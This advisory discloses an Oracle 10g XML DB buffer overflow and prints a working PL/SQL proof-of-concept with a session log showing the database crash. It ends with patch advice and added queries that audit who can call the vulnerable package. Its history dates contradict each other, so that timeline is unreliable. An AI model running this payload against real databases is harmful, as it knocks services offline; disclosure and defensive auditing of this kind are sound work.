Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)

Name: Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)
Systems Affected:
Severity: High Risk
Category: Denial of Service
Vendor URL: http://www.oracle.com/
Credit: Alexandr Polyakov
Exploit: http://dsecrg.com/pages/vul/show.php?id=19
Date: 28 Jan 2009

Details

This exploit causes the database to crash.

Example
set serveroutput on
declare
buff varchar2(32767);
begin
/* generate evil buffer */
buff:='12345678901234567890123456789';
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||'0012345678901234567890123sh2kerr';
/* lets see the buffer size */
dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;

/************************************************ POC ****************************/
Exploitation Log:
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>
SQL> set serveroutput on
SQL> declare
2 buff varchar2(32767);
3 begin
4 /* generate evil buffer */
5 buff:='12345678901234567890123456789';
6 buff:=buff||buff;
7 buff:=buff||buff;
8 buff:=buff||buff;
9 buff:=buff||buff;
10 buff:=buff||buff;
11 buff:=buff||'0012345678901234567890123sh2ker';
12 /* lets see the buffer size */
13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
15 end;
16 /
SEND EVIL BUFFER SIZE:959
declare
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-00972: identifier is too long
ORA-06512: at "XDB.XDB_PITRIG_PKG", line 26
ORA-06512: at "XDB.XDB_PITRIG_PKG", line 36
ORA-06512: at line 14


SQL> set serveroutput on
SQL> declare
2 buff varchar2(32767);
3 begin
4 /* generate evil buffer */
5 buff:='12345678901234567890123456789';
6 buff:=buff||buff;
7 buff:=buff||buff;
8 buff:=buff||buff;
9 buff:=buff||buff;
10 buff:=buff||buff;
11 buff:=buff||'0012345678901234567890123sh2kerr';
12 /* lets see the buffer size */
13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
15 end;
16 /
ERROR:
ORA-03114: not connected to ORACLE

declare
*
ERROR at line 1:
ORA-03135: connection lost contact


Patch Information
Apply the latest Oracle Security patches (e.g. CPU Jan 2008).
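
To judge exposure until the patch is applied, the following added example (not part of the original advisory) lists which accounts can call the package named above. It assumes a DBA session and uses only the standard dictionary views v$version, dba_tab_privs, dba_roles, dba_role_privs and dba_sys_privs.

```sql
-- Added example, not from the advisory. Run as a DBA on the database under review.

-- 1. Release banner. The advisory's log shows the crash on 10.1.0.2.0.
SELECT banner
FROM   v$version
WHERE  banner LIKE 'Oracle Database%';

-- 2. Direct EXECUTE grants on the package.
--    A grant to PUBLIC means every authenticated account can call it.
SELECT p.grantee,
       CASE
         WHEN p.grantee = 'PUBLIC' THEN 'all users'
         WHEN r.role IS NOT NULL   THEN 'role'
         ELSE 'user'
       END AS grantee_type,
       p.grantor,
       p.grantable
FROM   dba_tab_privs p
       LEFT JOIN dba_roles r ON r.role = p.grantee
WHERE  p.owner      = 'XDB'
AND    p.table_name = 'XDB_PITRIG_PKG'
AND    p.privilege  = 'EXECUTE'
ORDER  BY grantee_type, p.grantee;

-- 3. Accounts and roles that inherit the grant through nested roles.
SELECT DISTINCT grantee
FROM   dba_role_privs
START  WITH granted_role IN (SELECT grantee
                             FROM   dba_tab_privs
                             WHERE  owner      = 'XDB'
                             AND    table_name = 'XDB_PITRIG_PKG'
                             AND    privilege  = 'EXECUTE')
CONNECT BY PRIOR grantee = granted_role
ORDER  BY grantee;

-- 4. Accounts that can call it without any object grant at all.
SELECT grantee
FROM   dba_sys_privs
WHERE  privilege = 'EXECUTE ANY PROCEDURE'
ORDER  BY grantee;
```

Any row from queries 2 to 4 that is not required by an application is a candidate for revocation; test a revoke on a non-production copy first, since XML DB components may depend on the grant.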


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
Exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.